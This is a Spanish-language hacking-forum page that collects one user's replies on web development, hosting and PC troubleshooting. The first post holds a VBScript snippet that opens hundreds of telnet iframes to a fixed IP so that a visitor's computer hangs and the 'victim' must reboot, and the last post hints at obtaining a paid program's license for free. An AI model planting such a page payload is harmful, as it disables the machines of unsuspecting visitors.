elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6
1  Programación / Desarrollo Web / Re: javascript Unclosable Window en: 21 Abril 2012, 19:08 pm
Buen dia amigo, esos trucos que pueden ser realizados con javascript ya son antiguos y tienen la capacidad de cerrarse con el Administrador de Tareas, no hace mucho descubrí un método para burlar cualquier método de cerrado y que cuelga el computador instantáneamente.

Se trata de generar ventanas DOS utilizando VBScript, lo que esto hace es generar muchas ventanas DOS que dejará el computador inutilizable y la única opción de la victima será reiniciar el equipo.

Podemos utilizar algo como lo siguiente:

Código:
<script type="text/vbscript">  
for a=1 to 800  
document.write("<iframe src=" + chr(34) + "telnet://68.178.254.21:21" + chr(34) + ">")  
next  
</script>

Bueno sin más que decir, te dejo el link de mi artículo para que implementes el script completo: Jugando con ventanas DOS desde un sitio web y contigo.

Saludos.
2  Seguridad Informática / Seguridad / Re: Problema PC Muy lento durante el arranque y uso. en: 11 Marzo 2012, 01:56 am
Lo de los procesos es exactamente como lo mencionan los demás, pero, en cuanto a los pantallazos azules, es simple, apaga el pc y extrae la memoria ram o las, entonces limpialas delicadamente y luego sopla los puertos o limpialos con una brochita.

Con eso no deberían aparecer más, una vez me pasaba lo mismo y realice eso y más nunca me dio ese pantallazo ni nunca se me reinicio, falta de mantenimiento físico.

Saludos.
3  Programación / Desarrollo Web / Re: Reproductor flash/HTML5(?) o lo que sea en mi web, de vídeos y música en: 3 Enero 2012, 15:50 pm
Lo que mencionas en el título es muy diferente a lo que dices en el contenido, puedes diseñar un reproductor flash utilizando el programa Macromedia Flash Player 8, y si quieres reproducir música o vídeos en tu sitio, puedes utilizar la tecnología avanzada de estos tiempos, HTML5 como nombras en el título, puedes mirar este tutorial de insertar audio utilizando HTML5 y este de insertar vídeos.

Saludos.
4  Programación / Desarrollo Web / Re: problemas con auto bloggeo en: 19 Diciembre 2011, 01:16 am
¿Ya revisaste SimplePie? es una librería PHP muy popular que permite parsear Feeds del tipo RSS o Atom. Tiene todos los métodos necesarios para obtener todos los datos del Feed, incluso permite hacer cache de feeds para acelerar las consultas.

Se puede implementar para realizar un lector de feed y ser generadas, también puede realizarse una forma de almacenamiento de feed en base de datos.

Supongo que quedaría a cuestión tuya la programación.
5  Programación / Desarrollo Web / Re: SUPUESTA VIOLACION DE PAGINA WEB CON PUBLICIDAD AJENA en: 12 Diciembre 2011, 01:28 am
Que pueden modificar tus archivos no, pero si pueden suspender tu hosting desde su base de datos, modificar tus datos, transferencia, espacio, borrar etc... pero no tus archivos, Bueno de que pueden hacerlo lo pueden hacer pero ningun proveedor de hosting realiza una acción como esa, llevo tiempo utilizando diversas compañías de hosting y ninguna me a defraudado ni me a echo este tipo de acciones, solo una vez me suspendieron por violar solo una ley pero más nada y obvio que en la página principal al acceder al hosting por medio del hosting o dominio me salia el mensaje de Página suspendida por abuso u otro mensaje que pondría cada proveedor de hosting en su servidor, esto es normal, además hostgator es un excelente proveedor de hosting, cualquier duda o sugerencia contacta con tu soporte de ayuda hostgator.

Tengo experiencia por que e administrado servidores y ni yo ni los demás dueños nos hemos tomado la molestia de editar o copiar algún archivo del hosting de cada cliente.

Saludos. contacta con tu soporte es lo mejor.
6  Programación / Desarrollo Web / Re: ¿Cómo poner un formateador de código en blogger? en: 11 Diciembre 2011, 15:50 pm
Amigo el artículo de 2WebFacil es obsoleto y los links están rotos, solo te llevará a enredarte más en lo que deseas hacer, quiero compartirte un método eficaz que implemente en mi blog y hasta ahora funciona perfectamente, lo eh publicado y compartido en un artículo para personas como tu lo utilicen también.

SyntaxHighlighter:
http://onsoni.blogspot.com/2011/10/anadir-codigo-fuente-en-blogger.html

Espero pueda servirte, es excelente para añadir cualquier tipo de código en especifico, cualquier duda solo dime.

Saludos.
7  Programación / Desarrollo Web / Re: subir pagina web en: 5 Diciembre 2011, 03:12 am
Descarga un programa llamado: FlashfXP o también Filezilla los 2 te servirán, te recomiendo flashfxp para mi es mejor, bien cuando descargues me avisas y te explicó paso a paso.
8  Programación / Desarrollo Web / Re: Ajax en ActionScript en: 1 Diciembre 2011, 01:59 am
Con ActionScript se puede obtener el código fuente de un fichero Flash, pero de un sitio web no creo, desconozco eso, ehmm, utilizando php si puedes hacerlo con el siguiente código.

Código:
<?php
$url="http://elhacker.net";
$fo= fopen("$url","r") or die ("No se encuentra la pagina.");
while (!feof($fo)) {
    $cadena .= fgets($fo, 4096);
}
fclose ($fo);
print("<textarea name='area' cols='100' rows='10'>$cadena"); ?>

Eso te generaría el código fuente de un sitio en cualquier página estática.

Saludos.
9  Programación / Desarrollo Web / Re: Mensaje del navegador: ¿Confirmar reenvío de formulario? en: 1 Diciembre 2011, 01:56 am
Este problema persiste a la hora de programar o desarrollar un formulario .php, el problema es que al enviar los datos y se genera el aviso que podría ser "Mensaje Enviado" en ese mismo instante se preciona actualizar o recargar como le digas, y se envían nuevamente los datos ya enviados, osea es como un segundo envió.

Bueno mi conclusión consiste en que el problema persiste en el segundo archivo.php, si tu formulario corresponde al siguiente:

Index.php(dónde se encuentra el formulario)
Código:
<form method="post" action="envio.php" name="login_form">

Claramente los datos se enviarán a envio.php y ese archivo se encargara de reconocer los datos y enviarlos, pues en ese archivo se encuentra el problema.

Yo sugiero que utilices javascript para facilitarte la vida, también estoy de acuerdo con el amigo drvy, espero esta pequeña información sirva de algo, no puedo tratar tu problema con explicaciones y detalles claros, ya que no poseo ningún código de tu formulario, si proporcionas sería diferente, en fin.

Saludos.
10  Programación / Desarrollo Web / Re: editar y ver wordpress en tiempo real? en: 1 Diciembre 2011, 01:48 am
Amigo intenta utilizar el software Artisteer es un excelente programa para crear diseños WordPress, Blogger, Joomla, lo único es que necesitas una licencia pero se pueden conseguir gratuitas, yo conseguí una pero me resulto que de tanto buscar conseguí una versión del software tan des actualizada que no creaba diseños sobre Blogger el cual era el que me importaba pero al final logre lo que quería, espero te sirva.

Saludos.
Páginas: [1] 2 3 4 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines